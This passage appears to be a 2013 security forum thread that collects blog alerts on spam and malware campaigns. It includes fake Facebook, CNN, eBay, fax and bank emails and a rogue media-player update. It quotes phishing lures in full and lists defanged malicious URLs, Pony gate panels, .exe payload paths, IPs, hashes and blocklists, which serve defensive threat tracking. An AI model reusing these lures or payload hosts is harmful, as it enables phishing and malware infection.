- http://blog.webroot.com/2013/07/23/deceptive-media-player-update-ads-expose-users-to-the-rogue-video-downloaderbundlore-potentially-unwanted-application-pua/
July 23, 2013 - "Our sensors continue picking up deceptive advertisements that expose gullible and socially engineered users to privacy-invading applications and toolbars, most commonly known as Potentially Unwanted Applications (PUAs). The latest detected campaign utilizes multiple legitimately looking banners in an attempt to trick users into thinking that their media player needs to be updated. Once users install the bogus ‘Media Player Update’, they introduce third-party privacy-invading software onto their PCs and directly contribute to the revenue flow of the cybercriminals behind the campaign...
Sample screenshots of multiple deceptive ads leading to the same Potentially Unwanted Application (PUA):
> https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update.png
> https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update_01.png?w=869
> https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update_03.png?w=869
... Sample screenshot of the landing page:
https://webrootblog.files.wordpress.com/2013/07/deceptive_ads_rogue_ads_adware_potentially_unwanted_application_pua_bundlore_fake_media_player_update_06.png?w=641&h=544
Rogue URL:
hxxp ://dkg.videodownloadonline .com/download/video_downloader – 107.14.36.160; 107.14.36.120
Detection rate for the PUA – MD5: 85387afff8e5e66e2d9cc5dc1c43c922 * ... Adware.Downware.925; Bundlore (fs). The sample is digitally signed by Bundlore LTD, which is yet another pay-per-install affiliate network.
Rogue URL: bundlore .com – 98.129.229.186 – Email: eldad.shaltiel @gmail .com
... MD5s... known to have interacted with the same IP (98.129.229.186)..."
(More detail at the first webroot URL above.)
* https://www.virustotal.com/en/file/f67cfda990b302a4fa8d37a45c0424ca67f707988a3d6f7971768ce161ae4d3a/analysis/
___
Malware sites to block 23/7/13
- http://blog.dynamoo.com/2013/07/malware-sites-to-block-23713.html
23 July 2013 - "These malicious domains and IPs are associated with this prolific gang*. As usual, I've listed IPs with hosts first and then a plain list of IPs and domains for copy-and-pasting at the end..."
(Long list of IPs at the dynamoo URL above.)
* http://blog.dynamoo.com/search/label/Amerika
___
Linkedin Spam leads to Canadian Pharma sites
- http://www.threattracksecurity.com/it-blog/linkedin-spam-leads-to-canadian-pharma-sites/
July 23, 2013 - "We’ve seen an email spam-run taking place over the last couple of days, involving what appear to be compromised websites redirecting end-users to Canadian pharmacy spam pages (and quite possibly other forms of medicinal spam content too). Here’s an example of one such email – at time of writing, -all- of them are Linkedin message imitations:
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/sadtech1.jpg ...
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/sadtech4.jpg
... Another redirect destination we’ve seen is ipadherbaltablet(dot)com – again, offline at time of writing. Campaigns such as the above tend to be fast moving, constantly shifting URLs as compromised sites get a handle on the hack and new spam domains are set up to replace the ones that are blacklisted / shut down... they have the direct, non-Linkedin URL right there in the Email body. The non-hidden URLs, combined with the seemingly short lifespan of the spam sites will hopefully mean this one isn’t clogging up mailboxes for too long."
___
“Click This Photo for Tumblr Fame” Turns Volume Up...
- http://www.threattracksecurity.com/it-blog/click-this-photo-for-tumblr-fame-turns-volume-up-to-eleven/
July 23, 2013 - "... garish set of posts that have been doing the rounds on Tumblr over the last day or so. Here’s the most recent collection of archived posts on an affected blog..
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/clickforfame1.jpg
... “Click this photo for Tumblr fame”, claims the animated .gif. Animated? You bet. It rotates through 3 different “promo” images, and by the time the image goes out of sync on the Archive page it ends up looking something like this with all of the second-long splash images rotating away and vying for attention... The bulk of the posts on the above blog have around 1,000+ reblogs / notes each, though some of them are reposts of the same content. In all cases, they use a shortened URL service to send users to their final destination... At time of writing, none of the apps appear to have done anything publicly – there’s certainly nothing posted to our test account – but we’ll continue to monitor and see what happens."
(More detail at the first URL above.)
___
Something evil on 91.233.244.102
- http://blog.dynamoo.com/2013/07/something-evil-on-91233244102.html
23 July 2013 - "These following domains are hosted on 91.233.244.102 (Olborg Ltd, Russia). This IP is implicated in Runforestrun infectors*, has several malware detections on VirusTotal** plus a few on URLquery***. Google has flagged several domains as being malicious... Obviously there's quite a concentration of evil on this IP address and the simplest thing to do would be to banish it from your network, in fact I would personally recommend blocking the whole 91.233.244.0/23 block..."
(More detail at the dynamoo URL above.)
* http://malwaremustdie.blogspot.co.uk/2013/07/the-come-back-of-ru-runforrestruns-dga.html
** https://www.virustotal.com/en-gb/ip-address/91.233.244.102/information/
*** http://urlquery.net/search.php?q=91.233.244.102&type=string&start=2013-07-08&end=2013-07-23&max=50
___
Incoming Money Transfer Spam
- http://threattrack.tumblr.com/post/56245875980/incoming-money-transfer-spam
July 23, 2013 - "Subjects Seen:
Important Notice - Incoming Money Transfer
Typical e-mail details:
please complete the “A136 Incoming Money Transfer Form".
Fax a copy of the completed “A136 Incoming Money Transfer Form" to +1 800 722 1934.
To avoid delays or additional fees please be sure the Beneficiary Information including name, branch name, address, city, state, country, and Routing Number (ABA Number) or SWIFT BIC Code is correct. For international Wires be sure you include the International Routing Code (IRC) and International Bank Account Number (IBAN) for countries that require it.
Thank you,
Lowell_Madden
Senior Officer
Cash Management Verification
Malicious URLs
yourprospexblog .com:8080/ponyb/gate.php
myimpactblog .com:8080/ponyb/gate.php
phonebillssuck .com:8080/ponyb/gate.php
prospexleads .com:8080/ponyb/gate.php
abbeyevents .co .uk/fNF1.exe
salsaconfuego .com/RCY.exe
aasportsacademy .com/FPzbn.exe
whiteheadst .com/JrN9Jv.exe
Malicious File Name and MD5:
A136_Incoming_Money_Transfer_Form.zip (9BD136876BD8B5796C30F1750983E764)
A136_Incoming_Money_Transfer_Form.exe (3CDA70F6B2628A6CD1F552F5FEB11F05)
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3f8d504508cdaefc11a1c60350f6605d/tumblr_inline_mqec2r2TvM1qz4rgp.png
___
Fake Incoming Money Transfer SPAM / A136_Incoming_Money_Transfer_Form.zip
- http://blog.dynamoo.com/2013/07/webcashmgmtcom-incoming-money-transfer.html
23 July 2013 - "This fake webcashmgmt .com spam comes with a malicious attachment:
Date: Tue, 23 Jul 2013 10:21:08 -0500 [11:21:08 EDT]
From: WebCashmgmt [Alberto_Dotson @webcashmgmt .com]
Subject: Important Notice - Incoming Money Transfer
An Incoming Money Transfer has been received by your financial institution for spamcop.net. In order for the funds to be remitted on the correct account please complete the "A136 Incoming Money Transfer Form".
Fax a copy of the completed "A136 Incoming Money Transfer Form" to +1 800 722 5331...
There is an attachment A136_Incoming_Money_Transfer_Form.zip containing an executable file A136_Incoming_Money_Transfer_Form.exe. The VirusTotal detection rate is a miserable 6/47*.
This is a two stage pony/gate infection according to the Malwr report**. Functionally it looks very similar to the payload used in this spam run***."
* https://www.virustotal.com/en-gb/file/c1a9b3651a77901979e0d53cfc9eebb89805cb8ef678c61d42ce304357487023/analysis/1374594791/
** https://malwr.com/analysis/MDcyYmQ4NjRkYzJlNGYyYTkyZjI3YjEzMzliYmRhYjg/
*** http://blog.dynamoo.com/2013/07/irsgov-complaint-case-488870383295-spam.html
___
Facebook Friend Spam
- http://threattrack.tumblr.com/post/56253946196/facebook-freind-spam
July 23, 2013 - "Subjects Seen:
[removed] wants to be friends with you on Facebook.
Typical e-mail details:
[removed] wants to be friends with you on Facebook.
Malicious URLs
dynamicservicesllc .com/neglectfully/index.html
discountprescriptions.pacificsocial .com/displeased/index.html
ic44 .com/ganglier/index.html
hi-defhooters .com/topic/accidentally-results-stay.php
hi-defhooters .com /topic/accidentally-results-stay.php?VwsYyU=opovyGaoS&NWnVfHBlqeCu=CAAbE
hi-defhooters .com /topic/accidentally-results-stay.php?xf=2e2g2j2h2g&be=57312h522j2h2g562f2j&X=2d&Rf=q&El=C
hi-defhooters .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/ec962cc595f7d69325cea0e06eb3435c/tumblr_inline_mqehikGNae1qz4rgp.png
:fear: :mad:
AplusWebMaster
2013-07-24, 19:51
FYI...
Fake Facebook pwd reset SPAM / nphscards .com
- http://blog.dynamoo.com/2013/07/you-requested-new-facebook-password.html
- "This fake Facebook spam leads to malware on nphscards .com:
Date: Wed, 24 Jul 2013 11:22:46 -0300 [10:22:46 EDT]
From: Facebook [update+hiehdzge @facebookmail .com]
Subject: You requested a new Facebook password
facebook
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Didn't request this change?
If you didn't request a new password, let us know immediately.
Change Password
This message was sent to [redacted] at your request.
Facebook, Inc., Attention: Department 415, PO Box 10005, Palo Alto, CA 94303
The link in the email goes through a legitimate -hacked- site and then through one or both of these following scripts:
[donotclick]ftp.thermovite .de/kurile/teeniest.js
[donotclick]traditionlagoonresort .com/prodded/televised.js
The victim is then directed to [donotclick]nphscards .com/topic/accidentally-results-stay.php (report here*) which appears to be 403ing, but this may just be trickery. The site is hosted on 162.216.18.169 (Linode, US) and the domain nphscards .com itself appears to have been hijacked from GoDaddy. The domain nphssoccercards .com is also on the same server and is probably hijacked."
* http://urlquery.net/report.php?id=3976081
- https://www.virustotal.com/en/ip-address/162.216.18.169/information/
___
Royal Baby News Spam
- http://threattrack.tumblr.com/post/56335087514/cnn-royal-baby-breaking-news-spam
July 24, 2013 - "Subjects Seen:
"Perfect gift for royal baby … a tree?" - BreakingNews CNN
Typical e-mail details:
Washington (CNN)— What will the Obamas get the royal wee one? Sources say it’s a topic under discussion in the White House and at the State Department.
No baby buggy will do. The president and first lady must find a special gift to honor the special relationship between the United States and the United Kingdom.
Kate and William bring home royal baby boy
Malicious URLs
wurster .ws/rump/index.html
assuredpropertycare .net/intersperse/index.html
tennisclub-iburg .de/hepper/index.html
nphscards .com /topic/accidentally-results-stay.php?Ff=5656562e2i&Ce=2d2i562g552g2f572i54&P=2d&Ek=j&PD=j
nphscards .com /topic/accidentally-results-stay.php?TbcoUkQBgX=hGSiu&qhiHoQj=JBEYjg
nphssoccercards .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f16fcb9bd5affe88baecec65c204d2a4/tumblr_inline_mqg3qltKRB1qz4rgp.png
- http://blog.dynamoo.com/2013/07/cnn-perfect-gift-for-royal-baby-tree.html
24 July 2013 - "This fake CNN spam leads to malware on nphscards .com:
Date: Wed, 24 Jul 2013 19:54:18 +0400 [11:54:18 EDT]
From: "Perfect gift for royal baby ... a tree?" [BreakingNews @mail.cnn .com]
Subject: "Perfect gift for royal baby ... a tree?" - BreakingNews CNN
CNN
U.S. presidents have spotty record on gifts for royal births ..."
Screenshot: https://lh3.ggpht.com/-q2zR6Kvn-ng/UfBShXGCb-I/AAAAAAAABmQ/4Vbk1T74toY/s400/cnn-baby.png
The payload works in exactly the same way as this fake Facebook spam* earlier today and consists of a hacked GoDaddy domain (nphscards .com) hosted on 162.216.18.169 by Linode."
* http://blog.dynamoo.com/2013/07/you-requested-new-facebook-password.html
- https://www.virustotal.com/en/ip-address/162.216.18.169/information/
- http://www.threattracksecurity.com/it-blog/royal-baby-spam-leads-to-blackhole-zbot-malware/
July 24, 2013 - "... “Royal Baby” Malware to start making the rounds... The Malware in question involves... Blackhole Exploit Kit, which leads end-users to Zbot (the Zeus Infostealer) / Medfos ( which typically displays adverts, connects to numerous IP addresses and can also download additional files )..."
> http://www.threattracksecurity.com/it-blog/wp-content/uploads/2013/07/royalbabymalwarespam.jpg
___
eBay iPhone Order Spam
- http://threattrack.tumblr.com/post/56341055129/ebay-iphone-order-spam
July 24, 2013 - "Subjects Seen:
Payment Received - eBay item #[removed] NEW WHITE-CA Acoustic Guitar+GIGBAG+STRAP+TUNER+LESSON
Typical e-mail details:
Hello Dear Customer,
Your payment has been received for the following item. If extra shipping
charges is required per our ad and not received (for all military addresses/AK/PR/PO
Box and other U.S.territories outside of the 48 states), we may contact you
shortly. Be sure your Ebay registered address and contact phone number
is accurate as the order will be processed as such.
Malicious URLs
compare-treadmills .co .uk/fosters/index.html
bernderl .de/fife/index.html
tennisclub-iburg .de/hepper/index.html
nphscards .com/topic/accidentally-results-stay.php?ceJfcWErQTbG=kCwAByXBRdETOJ&tsDWPg=RpZTfjhgRFCk
nphscards .com/topic/accidentally-results-stay.php?ff=2g3131542j&ke=302g572f5352572i572f&D=2d&pb=U&sR=I
nphscards .com/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/3c4c2af7bce3117596be82842c9ddd94/tumblr_inline_mqg89rlx4R1qz4rgp.png
___
Fake inTuit emails - "Your payments are being processed for deposit"
- http://security.intuit.com/alert.php?a=84
7/23/13 - "People are receiving -fake- emails with the title "Your payments are being processed for deposit". Below is a copy of the email people are receiving.
> http://security.intuit.com/images/phish84.jpg
This is the end of the -fake- email.
- Steps to Take Now
Do not open the attachment in the email...
Delete the email..."
:mad::fear:
AplusWebMaster
2013-07-25, 19:22
FYI...
Fake CNN SPAM / evocarr .net
- http://blog.dynamoo.com/2013/07/cnn-77-dead-after-train-derails-spam.html
25 July 2013 - "This spam mismatches two topics, a train crash in Spain and the birth of a royal baby in the UK, but it leads to malware on evocarr .net:
Date: Thu, 25 Jul 2013 20:19:44 +0800 [08:19:44 EDT]
From: 77 dead after train derails [BreakingNews @mail.cnn .com>]
Subject: "Perfect gift for royal baby ... a tree?" - BreakingNews CNN
77 dead after train derails, splits apart in Spain
By Al Goodman, Elwyn Lopez, Catherine E. Shoichet, CNN July 25, 2013 -- Updated 0939 GMT (1739 HKT)
iReporter: 'It was a horrific scene'
STORY HIGHLIGHTS
NEW: Train driver told police he entered the bend too fast, public broadcaster reports
NEW: Regional governor declares 7 days of mourning for the victims, broadcaster says
Witness: "The train was broken in half. ... It was quite shocking"
77 people are dead, more bodies may be found, regional judicial official says
Madrid (CNN) -- An express train derailed as it hurtled around a curve in northwestern Spain on Wednesday, killing at least 77 people and injuring more than 100, officials said. Full Story ...
Screenshot: https://lh3.ggpht.com/-DV8NS7UNyVg/UfEkgvPaxkI/AAAAAAAABmk/2NCENHV902w/s400/cnn-train.png
The link in the email goes to a legitimate -hacked- site which tries to load one or more of the following scripts:
[donotclick]church.main .jp/psychosomatics/rayon.js
[donotclick]video.whatsonstage .com/overstocking/ownership.js
[donotclick]www.fewo-am-speckbusch .de/referees/metacarpals.js
From there the victim is sent to a landing page at [donotclick]evocarr .net/topic/accidentally-results-stay.php hosted on 69.163.34.49 (Directspace LLC, US). The following -hijacked- GoDaddy domains are on the same IP and can be considered suspect:
evocarr .net
serapius .com
leacomunica .net
mindordny .org
rdinteractiva .com
yanosetratasolodeti .org "
___
CNN Spanish Train Derailment Spam
- http://threattrack.tumblr.com/post/56423696906/cnn-spanish-train-derailment-spam
July 25, 2013 - "Subjects Seen:
"Perfect gift for royal baby … a tree?" - BreakingNews CNN
Typical e-mail details:
77 dead after train derails, splits apart in Spain
iReporter: ‘It was a horrific scene’
STORY HIGHLIGHTS
NEW: Train driver told police he entered the bend too fast, public broadcaster reports
NEW: Regional governor declares 7 days of mourning for the victims, broadcaster says
Witness: “The train was broken in half. … It was quite shocking"
77 people are dead, more bodies may be found, regional judicial official says
Madrid (CNN) — An express train derailed as it hurtled around a curve in northwestern Spain on Wednesday, killing at least 77 people and injuring more than 100, officials said. Full Story ...
Malicious URLs
caribbeancinemas .net/cheerfullest/index.html
sroehl .de/inpatient/index.html
evocarr .net/topic/accidentally-results-stay.php?wf=57552j302f&qe=302g572f5352572i572f&T=2d&XD=A&Zn=r
evocarr .net/topic/accidentally-results-stay.php?KVVWmNcvwPD=WJOsotrS&BTvKFG=felbOVVkanHPuB
evocarr .net/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/dace998b5db031c2e0372b6e9f46f9a4/tumblr_inline_mqhv187d9o1qz4rgp.png
___
Malicious Facebook E-Mail Spam Campaigns
- http://threattrack.tumblr.com/post/56424852456/malicious-facebook-e-mail-spam-campaigns
July 25, 2013
"New Password Request:
> https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9c4831b589f37e9558122e2362834db2/tumblr_inline_mqhvuapVxT1qz4rgp.png
Friend Request:
> https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b709af9dbc7bbacaf60707ced8746bc3/tumblr_inline_mqhw93PsWI1qz4rgp.png
Tagged Photos Notification:
> https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/b67e2f6f2df73be437bff6105fdd9e5f/tumblr_inline_mqhvvvTHbs1qz4rgp.png
Subjects Seen:
You requested a new Facebook password
<Name> wants to be friends with you on Facebook.
<Name> tagged 2 photos of you on Facebook
Typical e-mail details:
New Password Request:
Hello,
You recently asked to reset your Facebook password.
Click here to change your password.
Friend Request:
<Name> wants to be friends with you on Facebook.
Tagged Photos Notification:
<Name> added 5 photos of you.
Malicious URLs
dl2htd .de/surfaces/index.html
airductservicepro .com/lighthouse/index.html
99906.webhosting33.1blu .de/stupids/index.html
128.121.242.173 /nutritional/index.html
handmadelifecoaching .com/compelled/index.html
villaflorida .biz/deepness/index.html
ekaterini.mainsys .gr/exhorted/index.html
hackspitz .com/gnarl/index.html
joerg.gmxhome .de/skeptically/index.html
lostfounddevices .com/mama/index.html
spurtwinslotshelvingsystems .co .uk/aquamarine/index.html
bbsmfg .biz/servo/index.html
198.251.67.11 /reprehended/index.html
evocarr .net/topic/accidentally-results-stay.php?wf=57552j302f&qe=302g572f5352572i572f&T=2d&XD=A&Zn=r
evocarr .net/topic/accidentally-results-stay.php?KVVWmNcvwPD=WJOsotrS&BTvKFG=felbOVVkanHPuB
evocarr .net/adobe/update_flash_player.exe
___
Incoming Fax Report Spam
- http://threattrack.tumblr.com/post/56436571606/incoming-fax-report-spam
July 25, 2013 - "Subjects Seen:
INCOMING FAX REPORT : Remote ID: <random>
Typical e-mail details:
*********************************************************
INCOMING FAX REPORT
*********************************************************
Date/Time: 07/25/2013 04:42:54 CST
Speed: 26606 bps
Connection time: 05:09
Pages: 6
Resolution: Normal
Remote ID:
Line number: 1
DTMF/DID:
Description: June Payroll
Click here to view the file online ...
Malicious URLs
funeralsintexas .com/someplace/index.html
keralahouseboatstourpackages .com/mansion/index.html
christinegreenmd .com/inductees/index.html
ente-gmbh .de/bragg/index.html
impresiona2 .net/topic/regard_alternate_sheet.php?uf=2i2h2f5653&Je=302g572f5352572i572f&Y=2d&kc=i&bN=Q
impresiona2 .net/topic/regard_alternate_sheet.php?Ef=2i2h2f5653&Le=56302d2f2h53562j2j55&a=2d&dV=l&JB=a
impresiona2 .net/adobe/update_flash_player.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/85f8dbdb071da36d58feeaf97200b195/tumblr_inline_mqi537QlWe1qz4rgp.png
Fake FAX SPAM - 2013vistakonpresidentsclub .com
- http://blog.dynamoo.com/2013/07/incoming-fax-report-spam.html
25 July 2013 - "This fake fax report spam (apparently from the Administrator at the Victim's domain) leads to malware on 2013vistakonpresidentsclub .com:
Date: Thu, 25 Jul 2013 10:32:10 -0600 [12:32:10 EDT]
From: Administrator [administrator @victimdomain]
Subject: INCOMING FAX REPORT : Remote ID: 1150758119
*********************************************************
INCOMING FAX REPORT
*********************************************************
Date/Time: 07/25/2013 02:15:22 CST
Speed: 23434 bps
Connection time: 09:04
Pages: 8
Resolution: Normal
Remote ID: 1150758119
Line number: 2
DTMF/DID:
Description: June Payroll
Click here to view the file online ...
The link in the spam leads to a legitimate -hacked- site and then on to one or more of these three intermediary scripts:
[donotclick]1954f7e942e67bc1.lolipop .jp/denominators/serra.js
[donotclick]internationales-netzwerk-portfolio .de/djakarta/opel .js
[donotclick]www.pep7 .at/hampton/riposts.js
From there, the victim is sent to a malware landing page at [donotclick]2013vistakonpresidentsclub .com/topic/regard_alternate_sheet.php which was hosted on 162.216.18.169 earlier to day (like this spam*) and was presumably a hijacked GoDaddy domain. I can't tell for certain if this site is clean now or not, but it seems to be on 184.95.37.110 which is a Jolly Works Hosting IP, which has been implicated in malware before. I would personally block 184.95.37.96/28 to be on the safe side."
* http://blog.dynamoo.com/2013/07/cnn-perfect-gift-for-royal-baby-tree.html
** http://blog.dynamoo.com/search?q=jolly+works+hosting
:fear::fear: :mad:
AplusWebMaster
2013-07-26, 20:28
FYI...
Fake eBay SPAM / artimagefrance .com
- http://blog.dynamoo.com/2013/07/welcome-to-ebay-community-spam.html
26 July 2013 - "This fake eBay email leads to malware on artimagefrance .com:
Date: Fri, 26 Jul 2013 21:40:48 +0900 [08:40:48 EDT]
From: eBay [eBay@ reply1.ebay .com]
Subject: [redacted] welcome to the eBay community! ...
Screenshot: https://lh3.ggpht.com/-A3yIPZIZmr0/UfJ29Ko7f1I/AAAAAAAABnY/oICYwUwvGPU/s640/fake-ebay.png
The link in the email goes to a legitimate -hacked- site and then runs one or more scripts from the following list of three:
[donotclick]75.126.43.229 /deputy/clodhoppers.js
[donotclick]andywinnie .com/guessable/meteor.js
[donotclick]hansesquash .de/wimples/dunning.js
The victim is then sent to a malware landing page at [donotclick]artimagefrance .com/topic/accidentally-results-stay.php hosted on 184.95.37.110 (Secured Servers LLC, US / Jolly Works Hosting, Philippines). I would recommend blocking 184.95.37.96/28 in this case..."
... eBay Spam
- http://threattrack.tumblr.com/post/56515852365/welcome-to-ebay-spam
July 26, 2013 - "Subjects Seen:
<Name> welcome to the eBay community!
Typical e-mail details:
Welcome to eBay
The simpler way to save and shop
Start shopping ...
Malicious URLs
gwiz .de/balloonists/index.html
dialogueseriesonline .com/snag/index.html
dbrsnet .info/restore/index.html
b-able .gr/overshot/index.html
artimagefrance .com/adobe/update_flash_player.exe
artimagefrance .com/topic/accidentally-results-stay.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/f2bf2b94985161a820099500ce8ba421/tumblr_inline_mqjq2fl7mw1qz4rgp.png
___
Fake Intellicast weather SPAM / artimagefrance .com
- http://blog.dynamoo.com/2013/07/intellicastcom-spam-artimagefrancecom.html
26 July 2013 - "This fake weather spam leads to malware on artimagefrance .com:
Date: Fri, 26 Jul 2013 02:46:26 -0800 [06:46:26 EDT]
From: "Intellicast.com" [weather @intellicast .com]
Subject: Intellicast.com [weather @intellicast .com]
Intellicast.com Weather E-mail - Thursday, Jul 25, 2013 3:38 AM
For the complete 10-Day forecast and current conditions, visit ...
The payload and infection technique is exactly the same as the one used here*."
* http://blog.dynamoo.com/2013/07/welcome-to-ebay-community-spam.html
Intellicast Weather Report Spam
- http://threattrack.tumblr.com/post/56517479825/intellicast-com-weather-report-spam
July 26, 2013 - "Subjects Seen:
Intellicast .com <weather@intellicast .com>
Typical e-mail details:
Intellicast .com Weather E-mail - Thursday, Jul 25, 2013 3:38 AM
For the complete 10-Day forecast and current conditions, visit Intellicast .com:
intellicast .com/Local/Weather.aspx?location=USNH0164
Malicious URLs
tohoradio .dx .am/depression/index.html
tohoradio .dx .am/packers/index.html
artimagefrance .com/adobe/update_flash_player.exe
artimagefrance .com/topic/accidentally-results-stay.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/d54ab959ed6b7b2e8584f7f18f031633/tumblr_inline_mqjrk1Oilk1qz4rgp.png
___
Fake BoA transaction SPAM / payment receipt 26-07-2013 .zip
- http://blog.dynamoo.com/2013/07/bank-of-america-your-transaction-is.html
26 July 2013 - "This fake Bank of America spam has a malicious attachment:
Date: Fri, 26 Jul 2013 15:50:32 +0200 [09:50:32 EDT]
From: impairyd04 @gmail .com
Subject: Your transaction is completed
Transaction is completed. $09681416 has been successfully transferred.
If the transaction was made by mistake please contact our customer service.
Payment receipt is attached...
There is an attachment payment receipt 26-07-2013.zip which in turn contains the executable file payment receipt 26-07-2013.exe. This appears to be a Zbot variant with a pretty low detection rate of 9/46 at VirusTotal*. The Malwr report** is the most detailed for this sample, and Anubis also has some useful information. Of note is that there is network traffic to the following IPs that seem to be pretty common for this Zbot / Zeus variant..."
(Long list of URLs at the dynamoo URL above.)
* https://www.virustotal.com/en-gb/file/a01bbc1d6ec47557cb1611a7f999ac949b0a66e42d4e3348640cb179d20d5802/analysis/1374847946/
** https://malwr.com/analysis/YmQwZGUwYTVjMDczNDVjNTlkOThkY2E0MDYyYjJkNmQ/
___
CNN Walking Dead News Alert Spam
- http://threattrack.tumblr.com/post/56519745779/cnn-walking-dead-news-alert-spam
July 26, 2013 - "Subjects Seen:
BreakingNews CNN: New season new ‘Walking Dead’
Typical e-mail details:
What you’ll see on the new ‘Walking Dead’
Before heading to Comic-Con in San Diego last weekend, the cast members of “The Walking Dead" were each given a folder with talking points about the upcoming fourth season.
The folders contained information on what the actors could and couldn’t say about the new episodes, which premieres October 13 on AMC. Although none of the actors could reveal the contents of the folders, it was clear that there are lots of secrets to be kept about where “The Walking Dead" will be headed when it returns.
Full Story »»
Malicious URLs
grupocelebrate .com .br/lozenge/index.html
stem.harrisonschools .org/optimization/index.html
grupocelebrate .com .br/saintlier/index.html
artimagefrance .com/adobe/update_flash_player.exe
artimagefrance .com/topic/accidentally-results-stay.php
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/958a8c73670efa712dbebfca9d1f4ea1/tumblr_inline_mqjthnGGfk1qz4rgp.png
:mad: :fear:
AplusWebMaster
2013-07-29, 19:36
FYI...
Fake Facebook SPAM - happykido .com
- http://blog.dynamoo.com/2013/07/facebook-spam-happykidocom.html
29 July 2013 - "This fake Facebook spam leads to malware on happykido .com:
Date: Mon, 29 Jul 2013 09:33:38 -0600 [11:33:38 EDT]
From: Facebook [update+zj4o40c2_aay @facebookmail .com]
Subject: Betsy Wells wants to be friends with you on Facebook.
Interesting Pages on Facebook
Mark as favorite web pages that interest you to receive their updates in your News Feed.
Betsy Wells
Baldric Aguino
Astrid Aggas
Deloris Bransfield
Perdita Brantz
Danelle Erstad
Daphne Escamilla
Giovanna Hadesty
Georgeann Habel
Hugh Campisi
Jake Callas ...
Apparently all these people look alike:
- https://lh3.ggpht.com/-CkL-FcPTPRE/UfaM-AwUVCI/AAAAAAAABoY/erhuMZqK_wg/s400/fake-facebook.png
This is a "ThreeScripts" attack, clicking the link goes to a legitimate hacked site which then tries to run one of the following:
[donotclick]system-hostings .info/aphrodisiac/nought.js
[donotclick]gc.sceonline .org/worsens/patronizingly.js
[donotclick]www.kgsindia .org/retell/manson.js
from there, the victim is sent to a malware landing page on a -hijacked- GoDaddy domain at [donotclick]happykido .com/topic/able_disturb_planning.php hosted on 50.2.138.161 (ServerHub Phoenix, US). There are several other hacked GoDaddy domains on the same server, all of which should be considered to be malicious.
Recommended blocklist:
50.2.138.161 ..."
- https://www.virustotal.com/en-gb/ip-address/50.2.138.161/information/
___
Fake "Key Secured Message" SPAM / SecureMessage .zip
- http://blog.dynamoo.com/2013/07/key-secured-message-spam.html
29 July 2013 - "This spam has a malicious attachment:
Date: Mon, 29 Jul 2013 06:08:44 -0800 [10:08:44 EDT]
From: "Marcia_Manning @key .com" [Marcia_Manning @key .com]
Subject: Key Secured Message
You have received a Secured Message from:
Marcia_Manning @key .com
The attached file contains the encrypted message that you have received. To decrypt the
message use the following password - nC4WR706
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your
computer.
- Select whether to open the file or save it to your hard drive. Opening the file
displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it. This e-mail and any
attachments are confidential and intended solely for the addressee and may also be
privileged or exempt from
disclosure under applicable law. If you are not the addressee, or have received this
e-mail in error, please notify the sender
immediately, delete it from your system and do not copy, disclose or otherwise act upon
any part of this e-mail or its attachments...
The attachment SecureMessage.zip contains an executable SecureMessage.exe which has to be unencrypted with the password supplied in the email ( which is kind of stupid for a supposedly secure mail), and this has a VirusTotal detection rate of just 6/46*. The Malwr analysis** shows that this is a pony/gate downloader, first downloading from [donotclick]webmail.alsultantravel .com/ponyb/gate.php on 198.57.130.34 (Unified Layer / Bluehost, US) and then downloading one of the following:
[donotclick]a1bridaloutlet .co .uk/aiswY6.exe (5/45)
[donotclick]www.giftedintuitive .com/kQYjoPqY.exe (11/46)
[donotclick]198.61.134.93 /MM75.exe (5/45)
[donotclick]paulalfrey .com/guBwFA.exe (5/46)
Recommended blocklist:
198.57.130.34
198.61.134.93 ..."
* https://www.virustotal.com/en-gb/file/cb41b3a461f1de0a40e490eb203547faeedfd622507d6fea2623163bab0e62c9/analysis/1375109054/
- https://www.virustotal.com/en-gb/ip-address/198.57.130.34/information/
- https://www.virustotal.com/en-gb/ip-address/198.61.134.93/information/
** https://malwr.com/analysis/YWJiMDkyNjdhY2Y3NGFkY2I3MmNlMjBlMjAxZWVhMmU/
Key.com Secured Message Spam
- http://threattrack.tumblr.com/post/56785961967/key-com-secured-message-spam
July 29, 2013 - "Subjects Seen:
Key Secured Message
Typical e-mail details:
You have received a Secured Message from:
<removed>@key .com
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - <removed>
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from disclosure under applicable law...
Malicious URLs
198.57.130.35 :8080/ponyb/gate.php
webmail.alsultantravel .info:8080/ponyb/gate.php
alsultantravel .com:8080/ponyb/gate.php
webmail.alsultantravel .com:8080/ponyb/gate.php
a1bridaloutlet .co.uk/aiswY6.exe
giftedintuitive .com/kQYjoPqY.exe
198.61.134.93 /MM75.exe
paulalfrey .com/guBwFA.exe
Malicious File Name and MD5:
